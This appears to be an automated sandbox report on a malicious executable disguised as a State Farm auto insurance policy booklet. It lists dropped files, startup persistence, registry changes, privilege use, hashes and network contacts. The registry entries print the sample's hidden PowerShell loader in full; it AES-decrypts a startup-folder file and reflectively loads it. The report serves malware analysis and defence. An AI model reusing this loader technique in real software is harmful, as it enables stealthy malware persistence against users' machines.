Malware Analysis Report

2024-10-24 18:10

Sample ID 220610-v2jm9adfel
Target State-Farm-Auto-Insurance-Policy-Booklet.exe.zip
SHA256 02257b487a0c8a927a63e82adef0d9fafef53bac3bafbb98f417a5cbc3a9d6c0
Tags
Score 8/10

Analysis Overview

Score 8/10

SHA256

02257b487a0c8a927a63e82adef0d9fafef53bac3bafbb98f417a5cbc3a9d6c0

Threat Level: Likely malicious

The file State-Farm-Auto-Insurance-Policy-Booklet.exe.zip was found to be: Likely malicious.

Malicious Activity Summary

Executes dropped EXE

Drops startup file

Checks computer location settings

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-06-10 17:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-06-10 17:29

Reported

2022-06-10 17:33

Platform

win7-20220414-en

Max time kernel

114s

Max time network

43s

Command Line

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Plevin.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SXuGZcKhlvoTHGcRbriizwmgfiNLw.zZAHomszxsi C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxTWHVHWmNLaGx2b1RIR2NSYnJpaXp3bWdmaU5Mdy56WkFIb21zenhzaQ=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi\ = "yvlobsgsdlyfg" C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"

C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s

Network

N/A

Files

memory/2016-54-0x0000000000A80000-0x0000000000D14000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

MD5 dbc534854dd385e59a3f1906ddfb9020
SHA1 2b3062d82232ce10a8713829199769ff0d12e0fc
SHA256 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA512 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

memory/1616-55-0x0000000000000000-mapping.dmp

memory/1616-57-0x0000000075191000-0x0000000075193000-memory.dmp

memory/1360-58-0x0000000000000000-mapping.dmp

memory/1360-59-0x000000001B920000-0x000000001BC02000-memory.dmp

memory/1360-60-0x00000000003D0000-0x00000000003EC000-memory.dmp

memory/1360-61-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1360-62-0x00000000001D0000-0x00000000001D8000-memory.dmp

memory/1360-63-0x0000000002120000-0x00000000021C6000-memory.dmp

memory/1360-64-0x00000000009F0000-0x0000000000A24000-memory.dmp

memory/1360-65-0x0000000000A30000-0x0000000000A7A000-memory.dmp

memory/1360-66-0x0000000000530000-0x0000000000546000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-06-10 17:29

Reported

2022-06-10 17:33

Platform

win10v2004-20220414-en

Max time kernel

106s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Plevin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ISVTiCXTiQbcXcwgXUSwts.HIkwAElPUyfMKdNZZlMsAnLapQSLeWV C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxJU1ZUaUNYVGlRYmNYY3dnWFVTd3RzLkhJa3dBRWxQVXlmTUtkTlpabE1zQW5MYXBRU0xlV1Y='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\.hikwaelpuyfmkdnzzlmsanlapqslewv C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\.hikwaelpuyfmkdnzzlmsanlapqslewv\ = "xjeunwqrnedfhcfuamca" C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open\command C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"

C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe

"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
US 52.168.112.66:443 tcp
US 8.8.8.8:53 14.110.152.52.in-addr.arpa udp
US 209.197.3.8:80 tcp
CH 146.70.71.174:80 146.70.71.174 tcp
NL 2.17.222.14:80 tcp

Files

memory/3800-130-0x000001B4CEDC0000-0x000001B4CF054000-memory.dmp

memory/3800-131-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

memory/3800-132-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Plevin.exe

MD5 dbc534854dd385e59a3f1906ddfb9020
SHA1 2b3062d82232ce10a8713829199769ff0d12e0fc
SHA256 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA512 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951

memory/4244-133-0x0000000000000000-mapping.dmp

memory/544-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\State-Farm-Auto-Insurance-Policy-Booklet.exe.log

MD5 fff5cbccb6b31b40f834b8f4778a779a
SHA1 899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256 b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA512 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

memory/3800-138-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

memory/544-139-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

memory/544-140-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp

memory/544-141-0x000001B670240000-0x000001B670262000-memory.dmp